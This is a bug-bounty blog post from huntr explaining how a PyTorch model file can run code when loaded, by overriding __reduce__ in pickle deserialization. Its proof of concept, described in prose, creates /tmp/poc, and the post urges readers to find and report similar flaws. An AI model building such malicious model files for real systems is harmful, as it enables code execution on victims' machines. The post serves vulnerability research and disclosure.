huntr
+00:00 GMT
Hacking Resource
March 4, 2025

Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code

Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code
# Pickle Deserialization
# Bug Bounty Tips
# PyTorch
# Model File Vulnerability
# AI Model File Formats

PyTorch Pickle Vulnerability Exposed

Ethan Silvas
Ethan Silvas
Don’t Trust Your Model: How a Malicious Pickle Payload in PyTorch Can Execute Code
In this blog, we're breaking down one of our example Model File Vulnerabilities (MFVs) to help you understand how a trusted tool like PyTorch can be exploited. This example is a perfect starting point if you're looking to find and report your own MFVs on huntr.


The Vulnerability Explained

The Role of Pickle in PyTorch

  • Serialization with pickle: PyTorch uses Python’s pickle module for its torch.save() and torch.load() functions. This allows models to be saved and reloaded with ease.
  • The Risk Factor: The pickle protocol involves calling an object's __reduce__ method to determine how to rebuild it. If an attacker can override this method, they can control what happens during deserialization—leading to arbitrary code execution.


A Step-by-Step Walkthrough

Crafting the Malicious Model:
A custom PyTorch module is defined to override __reduce__. In our proof-of-concept (PoC), the overridden method instructs the deserialization process to run an OS command—touch /tmp/poc—as soon as the model is loaded.
Executing the Payload:
When an unsuspecting user tries to load the model using the standard <pytorch, tensorflow, whatever> method the payload triggers and executes arbitrary python code:

This PoC will use the arbitrary code execution to perform a simple arbitrary file creation to create /tmp/poc on the victim's machine.


Why Should You Care?

This vulnerability isn’t just a textbook case—it’s a gold mine for anyone looking to cash in on easy, high-impact exploits. Here’s why you should be all over it:
  • Endless Discovery Potential: Use this PoC as a launchpad to explore similar vulnerabilities across various model formats.
  • Lucrative Rewards: With huntr offering up to $4,000 per validated MFV, your next discovery could be both a reputation boost and a major payday.


Get Involved

This example MFV shows that even the most trusted machine learning frameworks can be exploited. By understanding the mechanics of PyTorch’s pickle deserialization, you can turn this knowledge into actionable insights—finding and reporting vulnerabilities before they can be exploited in the wild.
At huntr, we offer bounty payouts up to $4,000 per validated MFV. If you have discovered a vulnerability in how models are serialized or can demonstrate a novel exploit, submit your detailed proof-of-concept (PoC) via our submission portal. Happy hunting!
Comments (0)
Popular
avatar

Dive in

Related

11:02
video
Between Two Vulns: Llama 4 Drama, Gemini 2.5 Breakthroughs, and the MCP Takeover
By madivo Vorbrich • May 12th, 2025 Views 0
Blog
Exposing Keras Lambda Exploits in TensorFlow Models
By Ethan Silvas • Mar 31st, 2025 Views 3
Blog
Spotlight on winters0x64: Leveraging CTF Skills for AI/ML Bug Bounty Success
By Madi Vorbrich • Apr 18th, 2025 Views 4
6:48
video
Between Two Vulns: AI Co-Scientists—Revolution or Security Nightmare?
By madivo Vorbrich • Mar 31st, 2025 Views 3
Blog
Spotlight on winters0x64: Leveraging CTF Skills for AI/ML Bug Bounty Success
By Madi Vorbrich • Apr 18th, 2025 Views 4
6:48
video
Between Two Vulns: AI Co-Scientists—Revolution or Security Nightmare?
By madivo Vorbrich • Mar 31st, 2025 Views 3
Blog
Exposing Keras Lambda Exploits in TensorFlow Models
By Ethan Silvas • Mar 31st, 2025 Views 3